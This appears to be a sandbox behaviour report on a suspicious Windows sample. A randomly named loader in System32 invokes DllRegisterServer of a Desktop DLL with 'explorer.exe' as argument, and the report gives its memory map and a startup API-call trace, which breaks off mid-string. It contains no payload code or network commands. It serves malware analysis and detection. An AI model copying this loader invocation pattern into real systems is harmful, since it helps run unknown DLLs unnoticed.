"child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer /fn_args=\"explorer.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2381 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2382 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2383 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2384 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2385 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2386 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2387 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2388 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2389 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 2390 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2391 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2392 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2393 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 2394 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2395 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2396 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2397 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2398 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2399 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2400 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2401 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2402 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2403 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2404 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2405 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2406 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2407 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 2408 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2409 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2410 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2411 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2412 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 2413 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 2414 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2415 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2416 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2417 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2418 start_va = 0x1200000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2419 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2420 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2421 start_va = 0x1380000 end_va = 0x159ffff entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Thread: id = 114 os_tid = 0xd08 [0035.145] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf434 | out: lpSystemTimeAsFileTime=0x1cf434*(dwLowDateTime=0xe2a120f0, dwHighDateTime=0x1d3dfba)) [0035.145] GetCurrentProcessId () returned 0xd04 [0035.145] GetCurrentThreadId () returned 0xd08 [0035.145] GetTickCount () returned 0x17e91 [0035.145] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf42c | out: lpPerformanceCount=0x1cf42c*=373331975) returned 1 [0035.146] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.146] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0035.146] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0035.146] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0035.146] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0035.146] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.146] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.147] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.147] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.147] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.147] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.147] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.147] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.147] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.147] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.147] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.147] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.147] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.147] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.148] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.148] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.148] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.148] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.148] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.148] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.148] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.148] GetCurrentThreadId () returned 0xd08 [0035.148] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer /fn_args=\"explorer.exe\"" [0035.148] GetEnvironmentStringsW () returned 0x2979c0* [0035.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0035.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13709f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0035.148] FreeEnvironmentStringsW (penv=0x2979c0) returned 1 [0035.149] GetStartupInfoA (in: lpStartupInfo=0x1cf384 | out: lpStartupInfo=0x1cf384*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0035.149] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0035.149] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0035.149] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0035.149] SetHandleCount (uNumber=0x20) returned 0x20 [0035.149] GetLastError () returned 0x0 [0035.149] SetLastError (dwErrCode=0x0) [0035.149] GetLastError () returned 0x0 [0035.149] SetLastError (dwErrCode=0x0) [0035.149] GetLastError () returned 0x0 [0035.149] SetLastError (dwErrCode=0x0) [0035.149] GetACP () returned 0x4e4 [0035.149] GetLastError () returned 0x0 [0035.149] SetLastError (dwErrCode=0x0) [0035.149] IsValidCodePage (CodePage=0x4e4) returned 1 [0035.149] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1cf364 | out: lpCPInfo=0x1cf364) returned 1 [0035.149] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1cee30 | out: lpCPInfo=0x1cee30) returned 1 [0035.149] GetLastError () returned 0x0 [0035.149] SetLastError (dwErrCode=0x0) [0035.149] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x1cedc0 | out: lpCharType=0x1cedc0) returned 1 [0035.149] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf244, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.149] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf244, cbMultiByte=256, lpWideCharStr=0x1ceba8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.149] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x1cee44 | out: lpCharType=0x1cee44) returned 1 [0035.149] GetLastError () returned 0x0 [0035.149] SetLastError (dwErrCode=0x0) [0035.149] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0035.149] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf244, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.149] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf244, cbMultiByte=256, lpWideCharStr=0x1ceb78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㵒矲狰Ā") returned 256 [0035.149] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㵒矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.149] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㵒矲狰Ā", cchSrc=256, lpDestStr=0x1ce968, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.149] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x1cf144, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x18³:ô|ó\x1c", lpUsedDefaultChar=0x0) returned 256 [0035.150] GetLastError () returned 0x0 [0035.150] SetLastError (dwErrCode=0x0) [0035.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf244, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf244, cbMultiByte=256, lpWideCharStr=0x1ceb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㵒矲狰Ā") returned 256 [0035.150] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㵒矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.150] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㵒矲狰Ā", cchSrc=256, lpDestStr=0x1ce988, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0035.150] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x1cf044, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f 